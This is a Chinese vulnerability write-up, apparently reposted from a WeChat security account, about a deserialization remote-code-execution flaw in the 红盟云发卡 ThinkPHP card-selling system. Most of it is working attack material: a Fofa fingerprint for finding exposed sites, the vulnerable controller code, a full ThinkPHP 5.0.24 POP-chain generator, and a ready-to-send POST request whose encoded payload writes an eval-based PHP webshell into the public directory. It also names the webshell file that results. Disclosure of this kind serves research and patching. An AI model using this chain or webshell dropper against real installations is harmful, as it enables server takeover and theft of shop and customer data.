红盟云发卡系统存在反序列化RCE漏洞

admin

138858
文章

114
评论

2024年7月10日18:32:19评论404 views字数 4883阅读16分16秒阅读模式

漏洞简介

红盟云卡系统是一款基于ThinkPHP框架开发的高性能稳定虚拟商品在线售卖系统!系统支持多规格商品、微信订单推送、支持设置返佣和代理等级、支持分站等功能！

资产详情

Fofa:"/assets/shop/dist/uaredirect.js?v=1.2.0"

红盟云发卡系统存在反序列化RCE漏洞

漏洞分析

在 /application/shop/controller/Order.php 中存在unserialize反序列化函数，并且传入可控，且存在可利用的链子，导致前台反序列化漏洞产生

public function orderContent($order_no){  $user = Hm::getUser();  if($this->request->param('search_content')){    $search_content = unserialize(base64_decode(urldecode($this->request->param('search_content'))));    if(isset($search_content['order_no'])){      $where = [        'order_no' => $search_content['order_no']        ];    }else{      $where = [        'account' => $search_content['account'],        'password' => $search_content['password'],        'order_no' => $order_no        ];    }

ThinkPHP 5.0.24 POP链:

<?phpnamespace thinkprocesspipes {    class Windows {        private $files = [];        public function __construct($files){            $this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类        }    }}namespace think {    abstract class Model{        protected $append = [];        protected $error = null;        public $parent;        function __construct($output, $modelRelation){            $this->parent = $output;  //$this->parent=> thinkconsoleOutput;            $this->append = array("xxx"=>"getError");     //调用getError 返回this->error            $this->error = $modelRelation;               // $this->error 要为 relation类的子类，并且也是OnetoOne类的子类==>>HasOne        }    }}namespace thinkmodel{    use thinkModel;    class Pivot extends Model{        function __construct($output, $modelRelation){            parent::__construct($output, $modelRelation);        }    }}namespace thinkmodelrelation{    class HasOne extends OneToOne {    }}namespace thinkmodelrelation {    abstract class OneToOne    {        protected $selfRelation;        protected $bindAttr = [];        protected $query;        function __construct($query){            $this->selfRelation = 0;            $this->query = $query;    //$query指向Query            $this->bindAttr = ['xxx'];// $value值，作为call函数引用的第二变量        }    }}namespace thinkdb {    class Query {        protected $model;        function __construct($model){            $this->model = $model; //$this->model=> thinkconsoleOutput;        }    }}namespace thinkconsole{    class Output{        private $handle;        protected $styles;        function __construct($handle){            $this->styles = ['getAttr'];            $this->handle =$handle; //$handle->thinksessiondriverMemcached        }    }}namespace thinksessiondriver {    class Memcached    {        protected $handler;        function __construct($handle){            $this->handler = $handle; //$handle->thinkcachedriverFile        }    }}namespace thinkcachedriver {    class File    {        protected $options=null;        protected $tag;        function __construct(){            $this->options=[                'expire' => 3600,                 'cache_subdir' => false,                 'prefix' => '',                 'path'  => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',                'data_compress' => false,            ];            $this->tag = 'xxx';        }    }}namespace {    $Memcached = new thinksessiondriverMemcached(new thinkcachedriverFile());    $Output = new thinkconsoleOutput($Memcached);    $model = new thinkdbQuery($Output);    $HasOne = new thinkmodelrelationHasOne($model);    $window = new thinkprocesspipesWindows(new thinkmodelPivot($Output,$HasOne));    echo serialize($window);    echo base64_encode(serialize($window));}

漏洞复现

Payload(Windows+Linux 通用):

POST /shop/order/orderContent?order_no=123 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 1141Content-Type: application/x-www-form-urlencodedHost: 127.0.0.1:81Origin: http://127.0.0.1:81Referer: http://127.0.0.1:81/shop/order/orderContent?order_no=123Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1search_content=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mzp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czozOiJ4eHgiO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7aTowO3M6MTE6IgAqAGJpbmRBdHRyIjthOjE6e2k6MDtzOjM6Inh4eCI7fXM6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoxOntzOjEwOiIAKgBoYW5kbGVyIjtPOjIzOiJ0aGlua1xjYWNoZVxkcml2ZXJcRmlsZSI6Mjp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTozNjAwO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjEyMjoicGhwOi8vZmlsdGVyL2NvbnZlcnQuaWNvbnYudXRmLTgudXRmLTd8Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPWFhYVBEOXdhSEFnUUdWMllXd29KRjlRVDFOVVd5ZGpZMk1uWFNrN1B6NGcvLi4vYS5waHAiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czo2OiIAKgB0YWciO3M6MzoieHh4Ijt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319fX1zOjY6InBhcmVudCI7cjoxMTt9fX0=

红盟云发卡系统存在反序列化RCE漏洞

写入的文件名是以a.php+md5(tag_md5(xxx)).php命名的格式，xxx为上面pop链赋值的.

红盟云发卡系统存在反序列化RCE漏洞

之后会在public目录写入一个

a.php12ac95f1498ce51d2d96a249c09c1998.php

红盟云发卡系统存在反序列化RCE漏洞

原文始发于微信公众号（星悦安全）：红盟云发卡系统存在反序列化RCE漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

红盟云发卡系统存在反序列化RCE漏洞

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

F5 BIG-IP命令注入漏洞CVE-2025-23239

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞 POC

CVE-2025-24071｜Windows 文件资源管理器欺骗漏洞

CVE-2024-22243 Spring Web UriComponentsBuilder URL 解析不当漏洞分析

发表评论